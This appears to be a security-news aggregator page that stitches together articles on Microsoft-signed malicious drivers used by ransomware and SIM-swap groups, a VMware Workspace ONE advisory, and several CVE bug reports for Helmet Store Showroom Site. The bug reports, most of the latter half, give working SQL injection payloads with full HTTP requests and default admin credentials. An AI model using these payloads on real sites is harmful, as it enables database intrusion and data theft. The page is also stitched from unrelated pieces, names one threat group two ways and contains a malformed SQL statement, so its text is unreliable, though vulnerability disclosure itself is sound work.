By Habiba Rashid
Researchers at Sophos X-Ops Rapid Response (RR), Mandiant, and SentinelOne have confirmed Microsoft's blunder.
This is a post from HackRead.com Read the original post: Microsoft-Signed Drivers Helped Hackers Breach System Defenses

Evidence suggests that the Cuba ransomware gang used malicious hardware drivers certified by Microsoft’s Windows Hardware Developer Program in an attempted ransomware attack.

Remember when, in 2021, **a report surfaced** that revealed Microsoft had signed a driver called Netfilter, and later it turned out it contained malware? Well, it has happened again, but on a larger scale.

Sophos X-Ops Rapid Response (RR) recently discovered evidence which proves that threat actors potentially belonging to the Cuba ransomware gang used malicious hardware drivers certified by Microsoft’s Windows Hardware Developer Program in an attempted ransomware attack. 

Drivers — the software that allows operating systems and apps to access and communicate with hardware devices — require highly privileged access to the operating system and its data, which is why Windows requires drivers to bear an approved cryptographic signature before allowing the driver to load.

However, cybercriminals have long since found approaches to **exploit vulnerabilities** found in existing Windows drivers from legitimate software publishers. These hackers make an effort to progressively move up the trust pyramid, using increasingly well-trusted cryptographic keys to digitally sign their drivers. 

**Sophos** along with researchers from **Google-owned Mandiant** and SentinelOne warned Microsoft about these signed malicious drivers which were being planted into targeted machines using a variant of the BurntCigar loader utility. These two then worked in tandem to kill processes associated with **antivirus (AV)** and endpoint detection and response (EDR) products. 

“Ongoing Microsoft Threat Intelligence Center analysis indicates the signed malicious drivers were likely used to facilitate post-exploitation intrusion activity such as the deployment of ransomware,” Microsoft **said in an advisory** published as part of its monthly scheduled release of security patches, known as Patch Tuesday.

On left is a valid signature identified by Mandiant – On the right is a valid signature identified by Sophos

Microsoft concluded its investigation by stating that “no compromise has been identified,” and proceeded to suspend the partners’ seller accounts. Moreover, they released Windows security updates to revoke the abused certificates. 

Mandiant’s report is available **here**. In SentinelOne’s **blog post**, the security firm reported that it had seen several attacks where a threat actor used malicious signed drivers to evade security products which usually trust components signed by Microsoft.

The threat actors were observed to be targeting organisations in the business process outsourcing (BPO), telecommunications, entertainment, transportation, MSSP, financial and cryptocurrency sectors and in some instances, **SIM swapping was the end goal**.

Code signing overview

Cuba Ransomware group was identified to be involved in gaining $60 million from attacks against 100 organisations globally, according to **a joint advisory** earlier this month from the US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI.

The advisory also included warnings regarding the ransomware group which has been active since 2019 and continues to attack US entities in critical infrastructure, including financial services, government facilities, healthcare and public health, and critical manufacturing and information technology.

This is not the first time threat actors have used drivers signed by Microsoft in their operations, as we know it, and it seems that putting a stop to this practice has **not been an easy task for Microsoft**.

1.  **Microsoft Office Most Exploited Software in Malware Attacks**
2.  **BlueBleed Breach Microsoft Exposed 2.4 TB of Customer Data**
3.  **Microsoft security patch bypassed to drop Formbook malware**
4.  **Retired Software Boa Exploited To Target Power Grids, Microsoft**
5.  **Malware Apps Signed with Hacked Android Platform Certificates**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Microsoft-Signed Drivers Helped Hackers Breach System Defenses

VMware Workspace ONE Access and Identity Manager contain a broken authentication vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.

Advisory ID: VMSA-2022-0032

CVSSv3 Range: 5.3-7.2

Issue Date: 2022-12-13

Updated On: 2022-12-13 (Initial Advisory)

CVE(s): CVE-2022-31700, CVE-2022-31701

Synopsis: VMware Workspace ONE Access and Identity Manager updates address multiple vulnerabilities (CVE-2022-31700, CVE-2022-31701).

****1\. Impacted Products****

*   VMware Workspace ONE Access (Access)
*   VMware Identity Manager (vIDM)
*   VMware Cloud Foundation (Cloud Foundation)

****2\. Introduction****

Multiple vulnerabilities were privately reported to VMware. Updates are available to address this vulnerability in affected VMware products.

****3a. Authenticated Remote Code Execution Vulnerability (CVE-2022-31700)****

VMware Workspace ONE Access and Identity Manager contain an authenticated remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.2.

A malicious actor with administrator and network access may be able to remotely execute code on the underlying operating system.

To remediate CVE-2022-31700, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley of Source Incite for reporting this issue to us.

****3b. Broken Authentication Vulnerability (CVE-2022-31701)****

VMware Workspace ONE Access and Identity Manager contain a broken authentication vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.

A malicious actor with network access may be able to obtain system information due to an unauthenticated endpoint. Successful exploitation of this issue can lead to targeting victims.

To remediate CVE-2022-31701 apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Kyung Yoon for reporting this issue to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Access

22.09.0.0

Linux

CVE-2022-31700

N/A

N/A

Unaffected

N/A

N/A

Access

22.09.0.0

Linux

CVE-2022-31701

5.3

moderate

22.09.1.0

None

None

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31700

7.2

important

KB90399

None

None

Access

21.08.0.1, 21.08.0.0

Linux

CVE-2022-31701

5.3

moderate

KB90399

None

None

Access Connector

All

Windows

CVE-2022-31700, CVE-2022-31701

N/A

N/A

Unaffected

N/A

N/A

vIDM

3.3.6

Linux

CVE-2022-31700

7.2

important

KB90399

None

None

vIDM

3.3.6

Linux

CVE-2022-31701

5.3

moderate

KB90399

None

None

vIDM Connector

All

Windows

CVE-2022-31700, CVE-2022-31701

N/A

N/A

Unaffected

N/A

N/A

VMware Cloud Foundation (vIDM)

Any

Any

CVE-2022-31700, CVE-2022-31701

7.2

important

KB90384

N/A

N/A

****4\. References****

****5\. Change Log****

**2022-12-13 VMSA-2022-0032**  
Initial security advisory.

****6\. Contact****

CVE-2022-31701: VMSA-2022-0032

Malicious Windows drivers signed as legit by Microsoft have been spotted as part of a toolkit used to kill off security processes in post-exploitation cyber activity.

Malicious drivers certified by Microsoft's Windows Hardware Developer Program have been used to juice post-exploitation efforts by cybercriminals, Redmond warned this week — including being used as part of a small toolkit aimed at terminating security software in target networks.

"Several developer accounts for the Microsoft Partner Center were engaged in submitting malicious drivers to obtain a Microsoft signature," Microsoft explained in an advisory issued on Dec. 13. "A new attempt at submitting a malicious driver for signing on September 29, 2022, led to the suspension of the sellers' accounts in early October."

Code signing is used to provide a level of trust between the software and the operating system; as such, legitimately signed drivers can skate past normal software security checks, helping cybercriminals move laterally from device to device through a corporate network.

**SIM-Swap, Ransomware Attacks**

In this case, the drivers were likely used in a variety of post-exploitation activity, including deploying ransomware, the computing giant acknowledged. And Mandiant and SentinelOne, which along with Sophos jointly alerted Microsoft to the issue in October, have detailed the drivers' use in specific campaigns.

According to their findings, also issued on Dec. 13, the drivers have been used by the threat actor known as UNC3944 in "active intrusions into telecommunication, BPO \[business process optimization\], MSSP \[managed security service provider\], and financial services businesses," resulting in a variety of outcomes.

UNC3844 is a financially motivated threat group active since May that usually gains initial access to targets with phished credentials from SMS operations, according to Mandiant researchers.

"In some cases, the group’s post-compromise objectives have focused on accessing credentials or systems used to enable SIM-swapping attacks, likely in support of secondary criminal operations occurring outside of victim environments," Mandiant detailed in a separate Dec. 13 blog post on the issue.

In service of those goals, the group was observed using the Microsoft-signed drivers as part of a toolkit designed to terminate antivirus and EDR processes. That toolkit consists of two pieces: Stonestop, a Windows userland utility that terminates processes by creating and loading a malicious driver, and Poortry, a malicious Windows driver that uses Stonestop to initiate process termination.

SentinelLabs also observed a separate threat actor using the same driver, "which resulted in the deployment of Hive ransomware against a target in the medical industry, indicating a broader use of this technique by various actors with access to similar tooling."

To combat the threat, Microsoft has released Windows Security Updates that revoke the certificate for affected files and suspended the partners' seller accounts.

"Additionally, Microsoft has implemented blocking detections (Microsoft Defender 1.377.987.0 and newer) to help protect customers from legitimately signed drivers that have been used maliciously in post-exploit activity," the company noted in the advisory.

Microsoft-Signed Malicious Drivers Usher In EDR-Killers, Ransomware

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=view\_product&id=

Vulnerability location: /hss/?page=view\_product&id=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=view\_product&id=-5%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/?page\=view\_product&id\=\-5%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46117: bug_report/SQLi-1.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_product

Vulnerability location: /hss/classes/Master.php?f=delete\_product,id

dbname =hss\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46127: bug_report/SQLi-11.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/brands/manage_brand.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/brands/manage\_brand.php?id=

Vulnerability location: /hss/admin/brands/manage\_brand.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/brands/manage\_brand.php?id=-1%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/brands/manage\_brand.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46126: bug_report/SQLi-8.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=client/manage_client&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

First execute the following sql statement in the database to create the clients table

CREATE TABLE \`clients\` (
  \`id\` int(11) NOT NULL,
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /hss/admin/?page=client/manage\_client&id=

Vulnerability location: /hss/admin/?page=client/manage\_client&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=client/manage\_client&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=client/manage\_client&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46125: bug_report/SQLi-10.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/manage\_category.php?id=

Vulnerability location: /hss/admin/categories/manage\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/manage\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/manage\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46123: bug_report/SQLi-7.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/view\_category.php?id=

Vulnerability location: /hss/admin/categories/view\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/view\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/view\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46122: bug_report/SQLi-6.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=categories&c=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=categories&c=

Vulnerability location: /hss/?page=categories&c=, c

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=categories&c=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> c

GET /hss/?page\=categories&c\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

Tag

#windows